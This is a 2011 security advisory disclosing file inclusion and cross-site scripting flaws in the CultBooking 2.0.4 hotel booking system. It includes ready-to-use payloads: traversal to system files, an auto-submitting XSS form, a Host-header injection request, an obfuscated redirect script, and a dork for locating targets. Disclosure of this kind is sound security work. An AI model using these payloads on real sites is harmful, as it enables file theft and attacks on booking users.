CultBooking 2.0.4 Multiple Vulnerabilities

2011-01-22 09:15:33

CultBooking 2.0.4 (lang) Local File Inclusion Vulnerability

Vendor: Cultuzz Digital Media GmbH
Product web page: http://www.cultuzz.com
Affected version: 2.0.4

Summary: Open source hotel booking system (Internet Booking
Engine (IBE)). Via a central api called CultSwitch it is
possible to make bookings and set the actual availabilities
in the hotels pms. This is easy to install and easy to integrate
with full support.

Desc: CultBooking suffers from a local file inlcusion/disclosure
(LFI/FD) vulnerability when input passed thru the 'lang' parameter
to cultbooking.php script is not properly verified before being used
to include files. This can be exploited to include files from local
resources with directory traversal attacks and URL encoded NULL bytes.

~ Conditional on 'magic_quotes_gpc=off'.

Tested on: Microsoft Windows XP Professional SP3 (EN)
Apache 2.2.14 (Win32)
PHP 5.3.1
MySQL 5.1.41

Vulnerability discovered by: Gjoko 'LiquidWorm' Krstic
liquidworm gmail com
Zero Science Lab - http://www.zeroscience.mk

Advisory ID: ZSL-2011-4988
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-4988.php

16.01.2011


Dork: "inurl:cultbooking.php"

http://1.1.1.2/cultbooking.php?lang=c%3A%5C%5Cboot.ini%00
http://1.1.1.2/cultbooking.php?lang=../../../boot.ini%00

<!--

CultBooking 2.0.4 (cultbooking.php) Multiple XSS/PD Vulnerabilities


Vendor: Cultuzz Digital Media GmbH
Product web page: http://www.cultuzz.com
Affected version: 2.0.4

Summary: Open source hotel booking system (Internet Booking Engine (IBE)). Via a
central api called CultSwitch it is possible to make bookings and set the actual
availabilities in the hotels pms. This is easy to install and easy to integrate
with full support.

Desc: CultBooking Hotel Booking System suffers from a XSS/PD vulnerability when
parsing user input to the 'bookingcode', 'email' and 'lang' parameter via POST
and GET methods in cultbooking.php script. Attackers can exploit this weakness
to execute arbitrary HTML and script code in a user's browser session.

Tested on: Microsoft Windows XP Professional SP3 (EN)
Apache 2.2.14 (Win32)
PHP 5.3.1
MySQL 5.1.41

Vulnerability discovered by: Gjoko 'LiquidWorm' Krstic
liquidworm gmail com
Zero Science Lab - http://www.zeroscience.mk

Advisory ID: ZSL-2011-4987
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-4987.php

16.01.2011

-->


Dork: "inurl:cultbooking.php"

<script type="text/javascript">function xss1(){document.forms["xss"].submit();}</script>
<form action="http://1.1.1.2/cultbooking.php" enctype="application/x-www-form-urlencoded" id="xss" method="POST">
<input type="hidden" name="agentsine" value="10492">
<input type="hidden" name="agentdutycode" value ="1429741cfe1700d7">
<input type="hidden" name="lang" id="lang" value="en">
<input type="hidden" name="hcode" value="11225">
<input type="hidden" name="action" value="cancelbooking">
<input type="hidden" name="email" value='"><script>alert(2)</script>' />
<input type="hidden" name="bookingcode" value='"><script>alert(1)</script>' />
</form>
<a href="javascript: xss1();" style="text-decoration:none">
<b><font color="red"><center><h3>Exploit!<h3></center></font></b></a>


http://1.1.1.2/cultbooking.php?lang=%22%3E%3Cscript%3Ealert%281%29%3C/script%3E


HTML Injection via Header Attack:
---------------------------------------------------------------------
POST http://1.1.1.2/cultbooking.php HTTP/1.1
Host: "><zsl><h1>ZSL-CROSS-SCRIPT-EXECUTED"
Content-Length: 19
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.8.1.8) Gecko/2008101401 Firefox/3.1
Accept-Encoding: gzip,deflate
Keep-Alive: 50
Connection: Keep-Alive

action=cancellation
---------------------------------------------------------------------
Affected Header variable: Host


magic quotes bypass redirect:
http://1.1.1.2/cultbooking.php?lang="><script>document.location.href=String.fromCharCode(104, 116, 116, 112, 58, 47, 47, 122, 101, 114, 111, 115, 99, 105, 101, 110, 99, 101, 46, 109, 107);</script>

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.